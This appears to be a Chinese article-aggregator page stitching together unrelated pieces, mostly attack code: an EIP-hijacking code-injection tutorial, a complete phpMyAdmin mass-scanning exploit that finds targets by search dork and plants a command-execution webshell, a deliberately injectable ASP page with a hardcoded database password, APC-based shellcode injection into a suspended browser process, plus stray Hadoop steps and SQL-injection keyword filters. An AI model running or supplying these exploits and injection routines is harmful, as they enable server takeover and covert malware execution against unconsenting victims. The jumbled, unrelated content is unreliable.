下面是小编给各位读者分享的劫持正在运行进程的EIP注入代码的方法(共含7篇),欢迎大家分享。同时,但愿您也能像本文投稿人“在途死亡者”一样,积极向本站投稿分享好文章。
【标题】: 劫持正在运行进程的EIP注入代码的方法
【作者】: 火血狼(QQ:65845743)
【工具】: VC++, WINXP, WIN7
【声明】: 1.禁止用来做破坏;2.请告知作者.
-----------------------------------------------------------------------------
【灵感来源】
近日,在读< 劫持正在运行进程的EIP注入代码的方法
【第一步】修改另外进程的EIP寄存器
SuspendThread(hThread);//这里先让线程挂起,避免EIP乱跑
CONTEXT context;
context.ContextFlags = CONTEXT_CONTROL;
GetThreadContext(hThread, &context);
DWORD dwEIP = context.Eip;
context.ContextFlags = CONTEXT_CONTROL;
//
context.Eip = 0x000000; //这里随便设一个EIP值,导致目标进程崩溃
SetThreadContext(hThread, &context);
ResumeThread(hThread);
通过上面的代码实验,得出结论,EIP的设置是不受限制的。(其中hThread为目标进程的主线程句柄,至于如何得到,很多地方有例子,这里不再普及基础知识)
【第二步】构建合法的EIP值,引导目标进程EIP进入指定代码
在进行这一步的时候我遇到了以下几个问题:1.目标进程只能访问自身的虚拟内存地址;2.如何向内存中放入指定代码。
要解决第一个问题,就要用到
PVOID pCodeRemote = VirtualAllocEx(hProcess, NULL, (size_t)dwCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE));
这个代码将在目标进程的虚拟内存里申请一块儿大小为dwCodeSize的鲜活内存空间,并把内存起始指针返回。(并且页权限为可执行,可读写)
解决第二个问题,要用到汇编啦
写这样一个函数void __declspec(naked) __stdcall ASM_RemoteFunc{
_asm{ int 3 }
}
然后把这个函数Copy到刚才的内存中,用到代码
WriteProcessMemory(hProcess, pCodeRemote, (PVOID)ASM_RemoteFunc, (size_t)dwCodeSize, NULL)
到这里,又有疑问了,怎么确定dwCodeSize呢?嗯,可以在函数末尾加个特殊值,然后查找到这个值,就可以确定函数的末尾地址了,嘿嘿,来试试
(naked修饰这里也不解释,请读者自行查资料)
void __declspec(naked) __stdcall ASM_RemoteFunc(){
_asm{ int 3; push 0x12345679 }
}
这样写搜索代码
void* find_ptr(void* mem, DWORD dwv)
{
void* ret_ptr;
__asm
{
mov eax, mem
jmp comp
diff: inc eax
comp: mov ebx, [eax]
cmp ebx, dwv
jnz diff
mov ret_ptr, eax
}
return ret_ptr;
}
最后,函数大小可以通过下面代码来计算:
DWORD dwCodeStart = (DWORD)ASM_RemoteFunc; PVOID ptrCodeLocal = (PVOID)dwCodeStart; DWORD dwCodeEnd = (DWORD)find_ptr(ptrCodeLocal, PLACE_HOLDER_END) + 4; DWORD dwCodeSize = dwCodeEnd - dwCodeStart;
好了,第二部问题解决了,实验一下,果然,目标进程产生中断异常,说明执行了指定代码,但是最终程序还是会崩溃,
如何能让程序不崩溃呢?
【第三步】寄存器和堆栈恢复
先分析一下程序为啥崩溃:因为我们改变EIP的时候,其代码有可能处于任何位置,执行完我们的代码后,并没有恢复原来的EIP指针,也没有保护好各个寄存器的值,目标进程会出现不可预计的现象。
如何恢复EIP呢,写过shellcode的人都知道,ret可以做到这一点,于是我们先push当前的EIP,然后,再结束的时候ret,就会返回到原来的地方执行EIP啦,于是这样写:
void __declspec(naked) __stdcall ASM_RemoteFunc(){
_asm{
push 0x12345670
ret
push 0x12345679
}
}
呵呵,有人奇怪了,为啥用0x12345670而不用真正的EIP呢,因为这会儿我们无法得到,运行的时候才有。那怎么办呢?不用急,我们用找函数大小的方法找到0x12345670的地址,然后把目标进程的当前EIP,写入,不就行啦。
void * placeHolderEIP = find_ptr(ptrCodeLocal, 0x12345670);
memcpy((void *)placeHolderEIP, &dwEIP, 4);
运行,安静的通过,哈哈。
下面保护寄存器,并且调用一些有意思的代码:
#define PLACE_HOLDER_EIP 0x12345670
#define PLACE_HOLDER_ST1 0x12345671
#define PLACE_HOLDER_ST2 0x12345672
#define PLACE_HOLDER_FUN 0x12345678
#define PLACE_HOLDER_END 0x12345679
void __declspec(naked) __stdcall ASM_RemoteFunc(){
_asm{
push PLACE_HOLDER_EIP;
pushfd;
pushad;
push MB_OK | MB_ICONINFORMATION
push PLACE_HOLDER_ST1;
push PLACE_HOLDER_ST2;
push NULL
mov eax, PLACE_HOLDER_FUN;
call eax;
popad;
popfd;
ret;
push PLACE_HOLDER_END
}
}
按照同样的内存查找的方法,把指定地方放入自己的值:
HMODULE hModule = 0;
if (!(hModule = LoadLibrary(_T(“User32.dll”)))) return false;
DWORD funRemote = 0;
if (!(funRemote = (DWORD)GetProcAddress(hModule, “MessageBoxA”))) return false;
PVOID strRemote1 = NULL;
if (!(strRemote1 = VirtualAllocEx(hProcess, NULL, (size_t)(strlen(strPam1) + 1), MEM_COMMIT, PAGE_READWRITE))) return false;
PVOID strRemote2 = NULL;
if (!(strRemote2 = VirtualAllocEx(hProcess, NULL, (size_t)(strlen(strPam2) + 1), MEM_COMMIT, PAGE_READWRITE))) return false;
PVOID pCodeRemote = NULL;
if (!(pCodeRemote = VirtualAllocEx(hProcess, NULL, (size_t)dwCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE))) return false;
[1] [2] 下一页
格式:php
$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
);
if($argc > 1) {
print “|****************************************************************|n”;
print “ pmaPWN.php - d3ck4, hacking.expose@gmail.comn”;
print “ phpMyAdmin Code Injection RCE Scanner & Exploitn”;
print “ This is PHP version original milw0rm.com/exploits/8921n”;
print “ credit: Greg Ose, pagvac @ gnucitizen.orgn”;
print “ greetz: Hacking Expose!, HM Security, darkc0den”;
print “|****************************************************************|n”;
print “n”;
print “Usage: php $argv[0] n”;
exit;
}
print “|****************************************************************|n”;
print “ pmaPWN.php - d3ck4, hacking.expose@gmail.comn”;
print “ phpMyAdmin Code Injection RCE Scanner & Exploitn”;
print “ This is PHP version original milw0rm.com/exploits/8921n”;
print “ credit: Greg Ose, pagvac @ gnucitizen.orgn”;
print “ greetz: Hacking Expose!, HM Security, darkc0den”;
print “|****************************************************************|n”;
print “n”;
$Handlex = FOpen(“pmaPWN.log”, “a+”);
FWrite($Handlex, “|****************************************************************|n”);
FWrite($Handlex, “ pmaPWN.php - d3ck4, hacking.expose@gmail.comn”);
FWrite($Handlex, “ phpMyAdmin Code Injection RCE Scanner & Exploitn”);
FWrite($Handlex, “ This is PHP version original milw0rm.com/exploits/8921n”);
FWrite($Handlex, “ credit: Greg Ose, pagvac @ gnucitizen.orgn”);
FWrite($Handlex, “ greetz: Hacking Expose!, HM Security, darkc0den”);
FWrite($Handlex, “|****************************************************************|nn”);
print “[-] Master, where you want to go today? n”;
print “[-] example dork: intitle:phpMyAdmin n”;
fwrite(STDOUT, “n[ pwn3r@google ~] ./dork -s ”);
$dork = trim(fgets(STDIN));
print “n[!] QUERY: Select * FROM `googledb` Where `keyword` = '$dork'n”;
FWrite($Handlex, “[!] QUERY: Select * FROM `googledb` Where `keyword` = '$dork'n”);
for($i = 0; $i <= 900; $i+=100) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, “google.com”);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/1025 Firefox/2.0.0.9');
$pg = curl_exec($ch);
curl_close($ch);
if (preg_match_all(“/
/”, $pg, $links)) { $res[] = $links[2]; }
}
foreach($res as $key) {
foreach($key as $target) {
$total++;
}
}
print “[+] Done. $total rows return.n”;
FWrite($Handlex, “[+] Done. $total rows return.n”);
FClose($Handlex);
foreach($res as $key) {
foreach($key as $target) {
$Handlex = FOpen(“pmaPWN.log”, “a+”);
$real = parse_url($target);
$url = “”.$real['host'];
print “n[-] Scanning phpMyAdmin on ”.$url.“n”;
FWrite($Handlex, “n[-] Scanning phpMyAdmin on ”.$url.“n”);
FClose($Handlex);
sleep(5);
$curlHandle = curl_multi_init();
for ($i = 0;$i < count($list); $i++)
$curl[$i] = addHandle($curlHandle,$url.$list[$i]);
ExecHandle($curlHandle);
for ($i = 0;$i < count($list); $i++)
{
$text[$i] = curl_multi_getcontent ($curl[$i]);
//echo $url.$list[$i].“n”;
$Handlex = FOpen(“pmaPWN.log”, “a+”);
if (preg_match(“/phpMyAdmin/”, $text[$i]) or preg_match(“/Access denied/”, $text[$i]) and preg_match(“/phpMyAdmin/”, $text[$i])) {
print “n[!] w00t! w00t! Found phpMyAdmin [ ”.$url.$list[$i].“ ]”;
print “n[+] Testing vulnerable, wait sec..n”;
FWrite($Handlex, “n[!] w00t! w00t! Found phpMyAdmin [ ”.$url.$list[$i].“ ]”);
FWrite($Handlex, “n[+] Testing vulnerable, wait sec..n”);
if (preg_match(“/phpMyAdmin is more friendly with a/”, $text[$i])) {
print “n[!] w00t! w00t! NO PASSWD --> [ ”.$url.$list[$i].“ ]n”;
FWrite($Handlex, “n[!] w00t! w00t! NO PASSWD --> [ ”.$url.$list[$i].“ ]n”);
}
FClose($Handlex);
exploit_site($url.$list[$i]);
}
}
for ($i = 0;$i < count($list); $i++)//remove the handles
curl_multi_remove_handle($curlHandle,$curl[$i]);
curl_multi_close($curlHandle);
sleep(5);
}
}
function addHandle(&$curlHandle,$url)
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_HEADER, 0);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
curl_multi_add_handle($curlHandle,$cURL);
return $cURL;
}
//execute the handle until the flag passed
// to function is greater then 0
function ExecHandle(&$curlHandle)
{
$flag=null;
do {
//fetch pages in parallel
curl_multi_exec($curlHandle,$flag);
} while ($flag > 0);
}
function exploit_site($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_URL, $url.“scripts/setup.php”);
$result = curl_exec($ch);
curl_close($ch);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 1);
curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
curl_setopt($ch2, CURLOPT_URL, $url.“config/config.inc.php”);
$result2 = curl_exec($ch2);
curl_close($ch2);
//print $url;
if (preg_match(“/200 OK/”, $result) and preg_match(“/token/”, $result) and preg_match(“/200 OK/”, $result2)) {
print “n[!] w00t! w00t! Found possible phpMyAdmin vuln”;
print “n[+] Exploiting, wait sec..n”;
$Handlex = FOpen(“pmaPWN.log”, “a+”);
FWrite($Handlex, “n[!] w00t! w00t! Found possible phpMyAdmin vuln”);
FWrite($Handlex, “n[+] Exploiting, wait sec..n”);
FClose($Handlex);
exploit($url);
}
else {
$Handlex = FOpen(“pmaPWN.log”, “a+”);
print “n[-] Shit! no luck.. not vulnerablen”;
FWrite($Handlex, “n[-] Shit! no luck.. not vulnerablen”);
FClose($Handlex);
}
}
function exploit($w00t) {
$Handlex = FOpen(“pmaPWN.log”, “a+”);
$useragent = “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/1217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) ”; //firefox
//first get cookie + token
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t.“scripts/setup.php”); //URL
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
curl_setopt($curl, CURLOPT_COOKIEFILE, “exploitcookie.txt”);
curl_setopt($curl, CURLOPT_COOKIEJAR, “exploitcookie.txt”);
$result = curl_exec($curl);
curl_close($curl);
if (preg_match_all(“/token”s+value=“([^>]+?)”/“, $result, $matches));
$token = $matches[1][1];
if ($token != '') {
print ”n[!] w00t! w00t! Got token = “ . $matches[1][1];
FWrite($Handlex, ”n[!] w00t! w00t! Got token = “ . $matches[1][1]);
$payload = ”token=“.$token.”&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if($_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem($_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if($_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval($_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix“;
print ”n[+] Sending evil payload mwahaha.. n“;
FWrite($Handlex, ”n[+] Sending evil payload mwahaha.. n“);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t.”scripts/setup.php“);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_REFERER, $w00t);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_COOKIEFILE, ”exploitcookie.txt“);
curl_setopt($curl, CURLOPT_COOKIEJAR, ”exploitcookie.txt“);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec($curl);
curl_close($curl);
print ”n[!] w00t! w00t! You should now have shell here“;
print ”n[+] “.$w00t.”config/config.inc.php?c=id n“;
print ”n[!] Saved. Dont forget to check `pmaPWN.log`n“;
FWrite($Handlex, ”n[!] w00t! w00t! You should now have shell here“);
FWrite($Handlex, ”n[+] “.$w00t.”config/config.inc.php?c=id n“);
}
else {
print ”n[!] Shit! no luck.. not vulnerablen“;
FWrite($Handlex, ”n[!] Shit! no luck.. not vulnerablen“);
return false;
}
FClose($Handlex);
if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
//exit();
}
?>
,
9、新建一个Map/reduce 项目:
选择Project:
建立Map/Reduce项目:
项目名称:
10、把自带的WordCount 代码拷进去:
11、在本地硬盘新建一个测试文档:
上传到HDFS上面:
刷新:
新建的文档显示出来,可看见刚才写进去的内容:
12、运行代码:
右键àRun AsàRunConfigurations:
13、设置在HDFS上的文档输入输出路径:
中间空格分开:
hdfs://localhost:8020/input/file4.txt hdfs://localhost:8020/output/out4.txt
Console:
查看生成的out4.txt内容:
14、运行完毕:
15、可以关闭hadoop:
/*************************
说明:
判断传递的变量中是否含有非法字符
如$_POST、$_GET
功能:
防注入
**************************/
//要过滤的非法字符
$ArrFiltrate=array(”'“,”;“,”union“);
//出错后要跳转的url,不填则默认前一页
$StrGoUrl=”“;
//是否存在数组中的值
function FunStringExist($StrFiltrate,$ArrFiltrate){
foreach ($ArrFiltrate as $key=>$value){
if (eregi($value,$StrFiltrate)){
return true;
}
}
return false;
}
//合并$_POST 和 $_GET
if(function_exists(array_merge)){
$ArrPostAndGet=array_merge($HTTP_POST_VARS,$HTTP_GET_VARS);
}else{
foreach($HTTP_POST_VARS as $key=>$value){
$ArrPostAndGet[]=$value;
}
foreach($HTTP_GET_VARS as $key=>$value){
$ArrPostAndGet[]=$value;
}
}
//验证开始
foreach($ArrPostAndGet as $key=>$value){
if (FunStringExist($value,$ArrFiltrate)){
echo ”“;
if (empty($StrGoUrl)){
echo ”“;
}else{
echo ”“;
}
exit;
}
}
?>
保存为checkpostandget.php
然后在每个php文件前加include(“checkpostandget.php“);即可
style=”display:block;padding:0px 10px;“ class=”ContentFont“>
代码一:
<%
'--------定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'自定义需要过滤的字串,用 ”防 “ 分隔
Fy_In = ”’’’’防;防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防 truncate防char防declare防 <防>防=防 |防-防_ “
Fy_Inf = split(Fy_In, ”防 “)
If Request.Form. < > ” “ Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh)) < >0 Then
Response.Write ”
虽然能构建注入,但是存在局限性的!
<%
dim rs,strSQL,id
set rs=server.createobject(“ADODB.recordset”)
id = request(“id”)
strSQL = “select * from admin where id=” & id
rs.open strSQL,conn,1,3
rs.close
%>
把strSQL = “select * from admin where id=” & id 这句话里面的admin换成要伪造的表名,注意必须存在,
然后输入:目标IP/zhuru.asp?id=1
就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的!
-----------------------------
conn.asp文件代码:
<%
strSQLServerName = “127.0.0.1” '服务器名称或地址
strSQLDBUserName = “sa” '数据库帐号
strSQLDBPassword = “123456789” '数据库密码
strSQLDBName = “db_database” '数据库名称
Set conn = Server.CreateObject(“ADODB.Connection”)
strCon = “Provider=SQLOLEDB.1;Persist Security Info=False;Server=” & strSQLServerName & “;User ID=” & strSQLDBUserName & “;Password=” & strSQLDBPassword & “;Database=” & strSQLDBName & “;”
conn.open strCon
%>
我研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未文档函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求,让源码说明一切:(我为我的英文水平感到抱歉,我来自德国) 复制内容到剪贴板
代码:
#define _WIN32_WINNT 0x0400
#include
typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
func_NtMapViewOfSection NtMapViewOfSection = NULL;
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;
// 转换偏移量
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;
// 保存大小和起始地址
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;
// 转换标志为NT保护属性
if (dwDesiredAccess & FILE_MAP_WRITE)
{
Protect = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
Protect = PAGE_WRITECOPY;
}
else
{
Protect = PAGE_NOACCESS;
}
//映射区段
Status = NtMapViewOfSection(hFileMappingObject,
hProcess,
&ViewBase,
0,
0,
&SectionOffset,
&ViewSize,
ViewShare,
0,
Protect);
if (!NT_SUCCESS(Status))
{
// 失败
return NULL;
}
//返回起始地址
return ViewBase;
}
int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
HMODULE hDll = LoadLibrary( “ntdll.dll” );
NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, “NtMapViewOfSection”);
// 取ShellCode,任何你想实现的
HANDLE hFile = CreateFile (“C:shellcode.txt”, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
// 启动目标进程
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);
PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));
CreateProcess (“C:ProgrammeInternet Exploreriexplore.exe”, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
// 注入shellcode到目标进程地址空间
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
// 创建一个新的能够在目标线程恢复是首先执行的APC
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
ResumeThread (pi.hThread);
CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}
